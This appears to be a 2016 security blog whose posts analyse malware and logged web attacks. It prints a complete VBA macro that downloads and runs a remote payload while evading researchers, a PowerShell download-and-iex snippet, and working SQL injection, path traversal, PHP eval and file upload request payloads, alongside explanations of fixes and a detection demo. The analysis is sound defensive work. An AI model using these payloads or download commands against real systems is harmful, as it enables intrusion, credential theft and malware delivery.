Wednesday, August 31, 2016

Deobfuscating some more Javascript

Saw this paste with malicious javascript. If you strip out all the malicious variable creations (_zds, se, _dd) and the eval statement at the end, and replace them all with console.log() statements, you get a better picture of what it does. Run the same routine again on the output, replacing the bad stuff with console.log statements, and you finally get this code

and in it there is a freaky looking variable that ends up containing the URLs of interest. The URL strings are split across dozens of short variables and only concatenated at runtime, which is why a plain search for "http" in the original sample finds nothing.

var IGv7=[MMo+XQb1+Gd5 + VSv+Hb+Cl+Tj4+VKq+Pg + DSx+Pa + GYy+MEw1+Rj + Pf+NZa2 + Fb9+Fb+Ke+JPy+Ow9 + ORq+Sv+FOl7 + Cn, MMo+Ly5+YOv7 + AYc8+Sq6+So+Af1+Nu + Zz+ZKb + Zn1+Ik+Vy4+PRi5+Ho4+Gy9, VBg+DFu + ZDn + Cl0+Vw+Jc + Fs+Jp + Tu6+Vg7+OZv8 + UTt+Po+Cj3 + Gq8+EDt+Ag+LDc + Qn+St0+HNu + Sk6, MMo+Ly5+Qc7 + Vc9+Zn4 + ALt+Ui4 + BYt+Cc5+ZZq9 + Vm0+Ci5, Wq6 + Ya+Li5 + LJz3+Vg+Je1 + Yu8+ZPg+DFe5+HDm+Su1+Xz + XGx];

when printed out

console.log(IGv7);

["http://jago-computerservice.homepage.t-online.de/poxs17b", "http://www.elba-scaglieri.com/vj021d23", "http://sven-jaenecke.homepage.t-online.de/zvs7h", "http://www.arrotin.net/y263j", "http://bookinghotworld.ws/0b8acb"]



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Run this Free Scan on your Website

Mozilla came out with a great free online tool called the Mozilla Observatory, which gives you another way to gauge how securely your developers and sysadmins have set up your website. It's a simple A to F grade scale, and like every other tool it's not perfect, but if you have a dynamically generated site that pulls records from a database, for example, you really want to consider having your team modify your website code to get the score up to an A.



It tells you about many features, mostly HTTP header related, that you should be using on your site but may not be. The little informational icon next to each test gives details about how to resolve the issue.



It also tells you about your TLS configuration (Qualys SSL Labs is also a good tool for this).

Overall it's good to get 3rd party perspectives on the security of your site.


Web Developers Add this to your Script Tags

Troy Hunt wrote a great article on Web Subresource Integrity (SRI). As an example, notice this script tag, where you're pulling the jQuery library from a CDN so that you don't have to host it yourself and so you gain the browser caching benefit, since the user probably already has it cached anyway.

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.3/jquery.min.js" integrity="sha384-I6F5OKECLVtK/BL+8iSLDEHowSAfUo76ZL9+kGAgTRdiByINKJaqTPH/QVNS1VDb" crossorigin="anonymous"></script>

Notice the integrity and crossorigin attributes, which you may not normally be used to adding or seeing. If you're a web developer you really want to consider adding them. Why?

The integrity attribute means that when the browser loads jQuery from Cloudflare it calculates the hash of the file (a base64-encoded SHA-384 hash in this case, per the sha384- prefix in the attribute), compares it to the one in the script tag and only runs the file if they match. So if the CDN has been hacked, or your browser is somehow getting a man-in-the-middled, modified version of the file, the hashes won't match and it won't run. Note that this only protects the exact version you pinned (2.2.3 here): if you change the version in the src you must regenerate the hash, and a mistyped hash will block your own script on every visit.

The crossorigin attribute is set to anonymous to ensure no credentials or identity information (basic auth, cookies) is sent with the request. It is also required for the integrity check to work on a cross-origin script: without CORS the browser receives an opaque response it is not allowed to hash, so the check fails and the script is blocked.

Good simple stuff to add and increase the security on your site.


Prevent SQL Injection in PHP

Good quick read on preventing SQL injection by Kamran Mohsin

1-Input Validation
  e.g. cast integers to integers before using them so no SQL can ride along. Note that intval() turns any non-numeric string into 0, so validate the raw value as well (ctype_digit, or filter_var with FILTER_VALIDATE_INT) rather than relying on the cast alone.
   $id = intval($_GET['id']);


2-Prepared Statements
  e.g. the better way: it separates the SQL logic from the data, so bound values are never parsed as SQL
  $stmt = $dbh->prepare("INSERT INTO REGISTRY (name, value) VALUES (:name, :value)");
  $stmt->bindParam(':name', $name);
  $stmt->bindParam(':value', $value);
  $stmt->execute();


3-Least Privileges
e.g. even if your developer screwed up, limit what the bad guy can do. If the website only reads certain tables, give its database account read access to those tables and nothing else.



ipconfig /displaydns

Thought it'd be useful to share how to use the built-in Windows ipconfig /displaydns command for forensics or security research. It lists every DNS entry currently cached on the workstation, so you can see where you, or the malware you're researching, has been trying to call out to. The cache lives in memory and is cleared by ipconfig /flushdns or a reboot, so capture it early during triage.



And of course by combining commands you can quickly narrow down the results, for example by piping the output through findstr.




VBA Malware with Security Researcher Detection

I saw this paste titled deobfuscated malware on pastebin a few days ago. Thought it was worth discussing. This is a malicious VBA macro (which launches PowerShell) that downloads and executes a payload on the victim's computer.

.DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

What's interesting, or a bit different about this payload than others, is that the attacker is trying to perform "Security Researcher Detection". Similar to how some malware performs VMware detection in order to disable itself if it's being run in a virtual machine, this malware disables itself if it's being run from within a security research company's IP range. How? The macro asks maxmind.com for the geolocation of its own public IP address

  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False




and the attacker has a blacklist of strings

  Blacklist = Array( 'Return
   "FORTINET", _
...
   "TREND MICRO", _
...
   "FIREEYE", _


and if, for example, the response contained the text FIREEYE (a leading security research company)



then the malware would disable itself. Note that GetCity returns the entire JSON body of the MaxMind response, so the comparison covers every field in it (ISP, organisation, domain and so on), not just the city name:

  If BlacklistHit Then Error 102


So security researchers should be aware of code/attacks like this that may purposefully do nothing depending on how or where you run it from. This sample has two more tricks of the same kind: it also bails out if Word's recent-files list has fewer than three entries (RecentFileCountTooLow, a cheap test for a freshly built sandbox), and the payload only fires from an InkPicture Painted event rather than from the usual Document_Open.

Edit: Mistakenly typed Powershell instead of VBA in title. It's VBA that calls powershell.

The code

Dim gContinue As Boolean
Public Sub InkPicture1_Painted(ByVal Param1 As Long, ByVal Param2 As IInkRectangle)
  On Error GoTo x_Error
  If gContinue Then Exit Sub
   gContinue = True
   ExecutePayload
  Exit Sub
  x_Error:
End Sub

Public Sub ExecutePayload()
  If RecentFileCountTooLow Then Error 101
  If BlacklistHit Then Error 102
  Set WScriptShell = CreateObject("WScript.Shell")
  WScriptShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)", 0
  Exit Sub
End Sub

Public Function RecentFileCountTooLow() As Boolean
  RecentFileCountTooLow = RecentFiles.Count < 3
End Function

Dim City As String
Public Function BlacklistHit() As Boolean
  City = UCase(GetCity)
  For Each Value In Blacklist
   If InStr(City, Value) <> 0 Then GoTo InBlacklist
  Next
  Exit Function
  InBlacklist:
   BlacklistHit = True 'Return
End Function

Public Function Blacklist()
  Blacklist = Array( 'Return
   "FORTINET", _
   "CISCO", _
   "TREND MICRO", _
   "RACKSPACE", _
   "HOSTING", _
   "STRONG TECHNOLOGIES", _
   "DATA CENTER", _
   "IRON PORT", _
   "BLUECOAT", _
   "BLUE COAT", _
   "VMVAULT", _
   "MESSAGELABS", _
   "MICROSOFT", _
   "MIMECAST", _
   "LEASEWEB", _
   "BLACKOAKCOMPUTERS", _
   "ESET, SPOL", _
   "SERVER", _
   "DATACENTER", _
   "BITDEFENDER", _
   "DATACENTRE", _
   "OVH SAS", _
   "NFORCE", _
   "TRENDMICRO", _
   "ANONYMOUS", _
   "CLOUD", _
   "AMAZON", _
   "HISPEED.CH", _
   "HOSTED", _
   "IRONPORT", _
   "PALO ALTO", _
   "PROOFPOINT", _
   "SECURITY", _
   "TRUSTWAVE", _
   "FORCEPOINT", _
   "DEDICATED", _
   "HETZNER", _
   "FIREEYE", _
   "ZSCALER"
  )
End Function

Public Function GetCity() As String
  Set xmlHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
  xmlHttp.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
  xmlHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
  xmlHttp.Send
  If xmlHttp.Status <> 200 Then Error 201
   GetCity = xmlHttp.ResponseText 'Return
End Function



.xyz and .top domain names

It struck me that on many of the SANS ISC diaries [1] and the Malware Traffic Analysis blog posts [1], many if not the majority of the malware analyzed was reaching out to .xyz or .top domain names. They can go for less than $1/yr, which may be a contributing factor to why they're so popular with the bad guys. Head over to tld-list.com and sort by "Cheapest Register." It may not be correct to block them all, but in the current state of things it seems reasonable to alert on, or at least review, all email and web traffic to these top-level domains.


Malicious Powershell executing downloaded scripts

Interesting PowerShell commands. They download a script body using the system's default proxy settings and the logged-on user's default network credentials (so the download works through an authenticated corporate proxy), turn the response into a character array, join it back into a string and execute it with iex.

$web=new-object system.net.webclient;
$web.proxy = [system.net.webrequest]::defaultwebproxy;
$web.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;
[char[]]$x=([char[]]($web.downloadstring("http://X.X.X.X/file.asp")));
iex ($x -join '')



free @haveibeenpwned notification

Troy Hunt ‏@troyhunt
For those unfamiliar, the free @haveibeenpwned notification service emails you when your email address is in a breach: https://haveibeenpwned.com/NotifyMe




Tuesday, August 30, 2016

Work the Flow File Upload Sample Attack

Saw this web request and thought it was interesting enough to mention. It targets the Work the Flow File Upload plugin for WordPress and appears to be linked to this 2015 file upload exploit. The path shows the plugin shipping its own copy of the jQuery File Upload server-side handler (jquery-file-upload-9.5.0/server/php/index.php), and the attacker is uploading a file named wp-classes.php, i.e. a PHP file given a core-sounding name so it blends in with the rest of the install.

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php HTTP/1.1
Host: mysite.com
Content-Length: 270
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=18301442f2ce4a0aba32c60e4bf2f5db
action=upload
files=wp-classes.php


Patch your wordpress plugins or get rid of them if you don't use them!


Monday, August 29, 2016

Are Hackers looking at your Web Backups?

I read a great post on Mazin Ahmed's blog about backup file artifacts on the web. It's a great article on how developers, sysadmins, etc. have to be CAREFUL they aren't leaving backup files/artifacts out on the internet, freely accessible to the bad guys. For example ...
a.) Leaving a web.configBACKUP.txt file sitting in the root folder. Suddenly your connection strings are readable by anyone on the internet, because a .txt file is served as plain text rather than protected the way web.config itself is!!!
b.) Leaving an index.php.bak file in the web folder. Suddenly your server-side PHP source could be readable by the attacker, since the .bak extension is not handed to the PHP interpreter!!!
c.) Leaving a db.mdb.bak in the web folder. Suddenly a copy of your database is downloadable!!!


The bad news is, I've seen developers do this both on purpose and by accident. It might even get checked into source control and then auto-deployed! I've also seen sysadmins do this, for example when they're doing a website update or troubleshooting a production issue. It's CRITICAL that as developers and sysadmins you clean up and remove your backup artifacts from production.

The bad guys can use this to grab passwords, data, code, and much more that could allow them to get just enough information to break into your system.

The even worse news? I see bad guys running generic queries across the entire internet searching for these .bak, .backup, etc. files, so if you have one out there already, they may have already found it and used it against you. So take the time to clean your production server now, and remember to put a process in place so those files never get out there again!


CIO 5 Practices to make Hackers Life Harder

I liked this CIO Article 5 practices to make hackers lives harder By Thor Olavsrud.

1. Limit admin access to systems
2. Protect privileged account passwords
3. Extend IT security awareness training
4. Limit unknown applications
5. Protect user passwords with security best practices


Simple but effective. For #1, the fewer people that have access, the harder it is for the attacker to find somebody who has it. For #2, manage and monitor who or what systems get a privileged account, and where and how they're used; don't just create them and forget about them. For #3, humans are clearly the weakest link, so a lot of time and effort needs to be spent securing them. For #4, whitelist all applications and application accounts, and don't allow anything else to run. For #5, while most experts think passwords are going the way of the dinosaur soon, for most companies that hasn't happened yet, so there's no excuse for not following best practices on strength, expiration, etc.


Wordpress Test Environment Requests

Why would somebody make a request to this path?

GET /test/wp-admin/

It appears this is a common, perhaps the default, location to install a "test" environment for a WordPress blog. The problem is that if I do a Google search for test wp-admin pages I get a bunch that are indexed and accessible.



I would never advise having your test environment accessible from the internet. Only have it accessible locally. Test environments are never as locked down and monitored as production, and if your test blog is on the same server as production then you've just created a backdoor to production: once an attacker gets into your test environment they're on your production server.

Another, perhaps even bigger, problem is that when I do the Google search, most of these folders return a directory listing and allow access to potentially sensitive files. Uh-oh. Lock down your test environments or remove them if you don't need them, because the bad guys are looking for them!






Nagios XI noauth=1 requests

I've seen these admin page requests many times. The noauth=1 parameter leads me to believe that a misconfigured Nagios XI could allow an attacker to bypass authentication.

GET /nagiosxi/login.php?redirect=/nagiosxi/index.php0.000000&noauth=1


Kazehakase PHP Code Injection example

Saw this over the weekend. The path parameter carries ${@print_r(md5(1123123))}, which is not SQL at all: it is a PHP code-injection probe. If the application evaluates that value (template engines that expand ${...} expressions in untrusted input do exactly this), print_r(md5(1123123)) writes the MD5 of 1123123 into the response, and the scanner then knows it can execute PHP on the server. It's the same confirm-by-echo technique as the eval('echo 10000000000-...') probes elsewhere on this page.

GET /index.php/module/aciton/param1/$%7B@print_r(md5(1123123))%7D HTTP/1.1
Host: mysite.com
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6
Connection: keep-alive


The Kazehakase/0.5.6 user-agent stuck out to me as unique. Kazehakase is an obscure, long-discontinued Linux browser, so a request carrying that string is almost certainly a scanner with a canned User-Agent rather than a person.


Sample PHP Injection Themes.php

Another example of a PHP injection attempt. The POST body assigns a PHP snippet to a random-looking parameter name (qf385ab); if the target evaluates it, the arithmetic result (10000000000-245205634 = 9754794366) shows up in the response, which tells the attacker the server is vulnerable without dropping anything noisy.

POST /themes.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: mysite.com
Content-Length: 178
Content-Type: multipart/form-data; boundary=----------------------------f1fd927d4b1a
qf385ab=eval("echo 10000000000-245205634;");



Wordpress Gravity Forms File Upload Attempt

Here is a sample from this weekend of last year's Gravity Forms WordPress file upload exploit. Note the two tricks: gform_unique_id carries ../ segments to escape the intended upload directory, and the file name ends in .php5, an extension some servers still execute as PHP while naive checks only block .php.

POST /?gf_page=upload HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Length: 2476
Content-Type: multipart/form-data; boundary=3196e7ebf0e84b8499c31b44f2f68dd8
gform_unique_id=../../../../
name=css.php5
form_id=1
field_id=3
file=11.jpg



Wordpress Login Wall attack example

WordPress Login Wall was supposed to protect you against brute force and other login attacks. Instead, per this older blog post, if you use this plugin you may be exposed to attacks that pass raw PHP code to the login parameter for eval. Ouch.

GET /wp-content/plugins/login-wall-etgfb/login_wall.php?login=cmd


Magmi Magento Mass Importer PHP Injection

Sample PHP injection attempt on the Magento Mass Importer (Magmi) from Friday 8/26

GET /mygarmoemagmi/plugins/plugin.php?uors=eval('echo 10000000000-192853746;');

It would appear the attacker knows about a parameter called uors that may be passed to eval(), so he echoes an arithmetic result (10000000000-192853746 = 9807146254); if that number shows up in the HTTP response he knows the server executes injected PHP.

Update: another Magmi attack below, a path traversal in download_file.php aimed at app/etc/local.xml, which holds the Magento database credentials and encryption key.

GET /magmi/web/download_file.php?file=../../app/etc/local.xml


Friday, August 26, 2016

User-Agent Windows Seven

Hmmm, that user agent looks a little suspicious. No real browser sends a Mozilla/7.0 token, and Windows 7 identifies itself as "Windows NT 6.1", not "Windows Seven". Combined with the request for /Admin/phpMyAdmin/, this is a scanner, not a person.

185.117.73.132 - - [10/Jun/2016:03:33:49 -0400] "GET /Admin/phpMyAdmin/ HTTP/1.1" 404 295 "-" "Mozilla/7.0 (compatible; MSIE 8.0; Windows Seven)"


Thursday, August 25, 2016

interface/ipsconnect/ipsconnect.php SQL Injection

I saw this web request in the logs and thought it was worth discussing. It appears to be related to the IP.Board 'ipsconnect.php' SQL injection vulnerability in the id[] parameter, from around 2014/2015. There are public exploits, so script kiddies run these kinds of requests across the web all the time. The IPS Connect service (interface/ipsconnect/ipsconnect.php) in Invision Power Board (aka IPB or IP.Board) is the affected component.

POST /interface/ipsconnect/ipsconnect.php HTTP/1.1
Host: mywebsite.com
Connection: keep-alive
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip,deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
act=login
idType=id
id[]=-1
id[]=-1) and 1!="'" and updatexml(NULL,concat(0x3a, ( select table_name from information_schema.tables where BINARY LEFT(table_name, 1) = 'nnn' LIMIT 0,1 ) ),NULL)-- -'



If you look at the request above you see it's sending a payload into the id[] parameter, which must not be using parameterized queries and must not be validating the values correctly. The id should be an integer, but in this case it accepts strings, big ugly long strings, strings that contain SQL code!

updatexml() is a MySQL function that replaces the part of an XML document selected by an XPath expression: updatexml(xml_target, xpath_expr, new_xml). So why start with a NULL document and a NULL replacement? Because this is XPath error-based injection. The attacker's subquery is concatenated into the middle argument; when MySQL evaluates that string as XPath it is invalid (the leading 0x3a, a colon, makes sure of that), MySQL throws an error, and the ERROR message itself carries the exfiltrated data, as long as the application shows database errors to the client. In this case they are grabbing the name of a table starting with 'nnn' from information_schema to confirm they can read the database. If successful it'll display something like

Output : XPATH syntax error: ':tableNameHere'

To prevent this, make sure your IP.Board software is updated/patched, have a WAF or IPS that blocks SQL injection attacks, and from a coding perspective use parameterized queries so strings can't be passed where integers are expected, and validate input so special characters like these aren't allowed either. Also don't return database error text to the client: error-based techniques like this one depend on it.


Friday, August 19, 2016

TRUFFLEHUNTER Snort Rules

What are they? These links give some background: seclist and stack exchange.

That rule is a "truffle," which means it detects a security incident for which we unfortunately cannot provide additional information due to NDA restrictions. TruffleHunter rules are for vulnerabilities that have been discovered by Talos, disclosed to the vendor, but the vendor has not yet issued a patch.


Example:




Thursday, August 18, 2016

Example of Wordpress File Disclosure

I saw this attack in the logs and thought it was interesting enough to mention. It's a known exploit for the WordPress Elegance theme: arbitrary file download through the theme's dl-skin.php.

POST /wp-content/themes/elegance/lib/scripts/dl-skin.php HTTP/1.1
Host: mywebsite.mx
Content-Length: 60
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
_mysite_download_skin=../../../../../wp-config.php


It's actually quite simple: there is a PHP page called dl-skin.php that takes a POST parameter called _mysite_download_skin and was not properly sanitizing or checking file paths. It is supposed to only let a user request a skin file from the theme's skins folder, but since it does not check for path traversal the attacker can use ../ segments to walk up the directory tree and read any file they want. In this case they go up 5 folders (from lib/scripts/ to the WordPress root) to where they expect wp-config.php to be, which is your WordPress configuration file and contains the database credentials, the auth salts and all sorts of goodies. The same request can be pointed at /etc/passwd or anything else readable on the server.

To prevent this, of course, upgrade your themes, plugins and WordPress itself, and ideally remove themes and plugins you aren't using. The account running Apache also matters here: if it has proper least-privilege permissions, that limits which files the attacker can read through a bug like this. But if your web server processes run as root, or some other highly privileged account, the attacker can reach pretty much anywhere on the file system.


SQL Injection Example on Five Star Review

I pasted a few interesting web attacks from very recent logs. Thought it'd be interesting to run through some of them.

GET/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1

This first attack looks like it's related to the Five Star Review System, possibly an older well known vulnerability, on a company which appears to provide websites with review capabilities: add their PHP code to your website and your customers can review your products, provide feedback, rank them with stars, etc. The problem appears to be a SQL injection vulnerability reachable through the _FILES query string parameters: the request sets array elements of a variable named _FILES, tmp_name included, and whatever the application does with that value is not sanitized, so an attacker is able to execute SQL against the database behind the website. Pulling out the SQL-looking pieces gives the statement below. To get the exploit to work they have to escape characters, which is why you see the @`\'` pairs: they balance the quoting so the syntax reaches MySQL intact. The #@__ in the table name looks like a table-prefix placeholder that the application substitutes at runtime, so the real target is the admin table under whatever prefix the site uses.

' or mid=' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Next it's interesting to see the /**/ because that looks like comments, right? They can be ignored, right? WRONG! /*!50000 actually has significance in MySQL. The "50000" refers to a MySQL version, and it tells MySQL that version 5.0.0 and above should execute the text inside the comment. Any other database, and any naive filter, sees a comment and skips it, which is exactly why attackers use it.

' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Thus there's actually a union and select statement hidden in there !

' union select 1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Now you can see from here that the attacker knows the original query returns 9 columns, which is why the union select is padded with 8 integer values, and only the 4th column is of any interest, so that must be the column the website displays in the HTML so the attacker can read his results.

select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1


Thus we're down to just that interesting column. You can see it concatenates 0x7c, which is a pipe (|) in hex, with the userid and password. Thus you may see something like '|myusername|mypassword' returned to the screen. Finally notice that it queries the __admin table, which must be where the administrator usernames and passwords live for the Five Star Review system, and it's only pulling one record: the limit clause 0,1 means start at record 0 (the 1st one) and pull 1 record. So it's just returning the top record, which is likely the administrator of the Five Star Review system.

GET /admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1

This is a very similar attack to the one described in detail above, with a couple of differences worth noticing. The id parameter is numeric, so no quote is needed to break out of the query, and the "and 1=2" makes the original WHERE clause match nothing, so the only row the page renders is the one produced by the union select. The 35 placeholders tell you the original query selects 35 columns, and loginname and password are placed in positions 6 and 10, presumably the two that the page displays. I'm guessing this is related to the ASP CMS (content management system) just based on the table they are trying to grab records from (aspcms_user). Notice they are looking for userid=1, which is likely the system administrator record.

Remember, to prevent SQL injection use parameterized queries: the value is bound as data, so it can't change the data type the query expects and an apostrophe in it can never close the string literal. Also use a sanitization library that escapes/encodes bad characters. Also make sure to do server side validation: if a parameter is supposed to take an ID # then only allow integers! If it's supposed to be a file name then make sure it matches a regex, even one as simple as .*\..{1,3}.
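
Here is an added example (mine, not the post's or the review system's code) that recreates the mechanics above in Python against an in-memory SQLite database. The schema, the review row and the admin row are constructed stand-ins: only the __admin table and its userid and pwd columns come from the logged payload. SQLite does not execute MySQL's /*!50000 ... */ comments, so the example unwraps them itself, which is also the normalisation step a WAF rule or log parser needs before it can spot the union select:

```python
import re
import sqlite3

# Constructed stand-in schema: the review query returns 9 columns and column 4 is
# the one the page renders. Only __admin/userid/pwd appear in the logged payload.
SCHEMA = """
CREATE TABLE reviews(id INTEGER, mid TEXT, c3 TEXT, body TEXT,
                     c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT);
INSERT INTO reviews VALUES (1, '17', '', 'Great product', '', '', '', '', '');
CREATE TABLE __admin(userid TEXT, pwd TEXT);
INSERT INTO __admin VALUES ('siteadmin', 's3cret');
"""

# Same shape as the logged payload. SQLite has no CONCAT(0x7c, ...), so '|' || ...
# is used instead; the trailing '-- ' comments out the quote the application appends.
PAYLOAD = ("' /*!50000union*//*!50000select*/ 1,2,3,"
           "(select '|' || userid || '|' || pwd from __admin limit 0,1),"
           "5,6,7,8,9 -- ")

VERSION_COMMENT = re.compile(r"/\*!\d{5}(.*?)\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)


def unwrap_version_comments(sql):
    """Do what MySQL >= 5.0.0 does with /*!50000 ... */: keep the text inside.

    SQLite, other engines and a WAF that strips comments see nothing there."""
    return VERSION_COMMENT.sub(r" \1 ", sql)


def looks_like_union_injection(value):
    """Detection check for a log parser or WAF: normalise first, then match."""
    return UNION_SELECT.search(unwrap_version_comments(value)) is not None


def open_demo_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_vulnerable(con, mid):
    """The bug: the parameter is pasted into the SQL, so a quote ends the literal
    and everything after it is executed as SQL."""
    sql = ("SELECT id, mid, c3, body, c5, c6, c7, c8, c9 FROM reviews "
           "WHERE mid='" + mid + "'")
    return [row[3] for row in con.execute(unwrap_version_comments(sql))]


def lookup_safe(con, mid):
    """The fix: a bound parameter is data, never SQL, whatever it contains."""
    sql = "SELECT id, mid, c3, body, c5, c6, c7, c8, c9 FROM reviews WHERE mid=?"
    return [row[3] for row in con.execute(sql, (mid,))]


if __name__ == "__main__":
    con = open_demo_db()
    print(lookup_vulnerable(con, PAYLOAD))      # ['|siteadmin|s3cret']
    print(lookup_safe(con, PAYLOAD))            # []
    print(looks_like_union_injection(PAYLOAD))  # True
```

The vulnerable lookup hands back the pipe-joined admin credentials in column 4, exactly the column the attacker padded around; the parameterised lookup treats the whole payload as a review id that matches nothing.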


Friday, August 12, 2016

adsfoundation.xyz

Was on an iPhone in Safari when I was redirected to this nasty looking site. I wouldn't recommend clicking :-)

hxxp://adsfoundation.xyz/033/YTozOntzOjEwOiJyZXF1ZXN0X2lkIjtzOjIyOiI1N2FjZjdhYzQ5NDBhODk5MDYzNDQ1IjtzOjEzOiJ0cmFja2luZ19saW5rIjtzOjEwNzoiaHR0cDovL3NlY3VyZS50cmFjazJtb2JpbGUuY29tL2FmZl9jP29mZmVyX2lkPTkwMiZhZmZfaWQ9MTY2JmFmZl9zdWI9NTdhY2Y3YWM0OTQwYTg5OTA2MzQ0NSZhZmZfc3ViMj1VU19UUjciO3M6OToidGltZXN0YW1wIjtpOjE0NzA5NTMzOTg7fQ==#
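
The long path segment is base64, and decoding it is worth doing whenever a URL like this shows up. Here is an added example (mine, not part of the original post) that pulls the segment out of the URL above and parses the result. It turns out to be PHP serialize() output: an array holding a request_id, a tracking_link with affiliate-style parameters (offer_id, aff_id, aff_sub) and a Unix timestamp that lands on 2016-08-11 UTC, the day before this post. The unserialize reader covers only the scalar and array types needed here:

```python
import base64
from datetime import datetime, timezone
from urllib.parse import urlsplit

# The URL quoted in the post (hxxp defanged), copied here as the sample input.
SAMPLE_URL = "hxxp://adsfoundation.xyz/033/YTozOntzOjEwOiJyZXF1ZXN0X2lkIjtzOjIyOiI1N2FjZjdhYzQ5NDBhODk5MDYzNDQ1IjtzOjEzOiJ0cmFja2luZ19saW5rIjtzOjEwNzoiaHR0cDovL3NlY3VyZS50cmFjazJtb2JpbGUuY29tL2FmZl9jP29mZmVyX2lkPTkwMiZhZmZfaWQ9MTY2JmFmZl9zdWI9NTdhY2Y3YWM0OTQwYTg5OTA2MzQ0NSZhZmZfc3ViMj1VU19UUjciO3M6OToidGltZXN0YW1wIjtpOjE0NzA5NTMzOTg7fQ==#"


def php_unserialize(data, pos=0):
    """Minimal reader for PHP serialize() output: N, b, i, d, s and a (arrays).

    Returns (value, next_pos). s:LEN counts bytes, so the caller passes a latin-1
    decoded string in which one character is one byte."""
    kind = data[pos]
    if kind == "N":                                   # N;
        return None, pos + 2
    if kind in "ibd":                                 # i:123;  b:1;  d:1.5;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        value = float(raw) if kind == "d" else int(raw)
        return (bool(value) if kind == "b" else value), end + 1
    if kind == "s":                                   # s:LEN:"bytes";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2
        return data[start:start + length], start + length + 2
    if kind == "a":                                   # a:COUNT:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2
        result = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            value, pos = php_unserialize(data, pos)
            result[key] = value
        return result, pos + 1                        # skip the closing brace
    raise ValueError("unsupported PHP serialize type %r at %d" % (kind, pos))


def decode_tracking_blob(url):
    """Base64-decode the last path segment of url and parse it as PHP serialize()."""
    segment = urlsplit(url).path.rsplit("/", 1)[-1]
    raw = base64.b64decode(segment + "=" * (-len(segment) % 4))
    value, _ = php_unserialize(raw.decode("latin-1"))
    return value


if __name__ == "__main__":
    blob = decode_tracking_blob(SAMPLE_URL)
    for key, value in blob.items():
        print("%-14s %s" % (key, value))
    print(datetime.fromtimestamp(blob["timestamp"], timezone.utc))
```

The tracking_link is the thing to pivot on: the same request_id is reused as the aff_sub parameter, so the redirector is passing its own click identifier through to the next hop.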




Wordpress File Path Traversal Examples

I pasted several similar Wordpress exploit attempts from some web logs. They generally match WAF or IDS rules of file traversal. They look like this...

GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
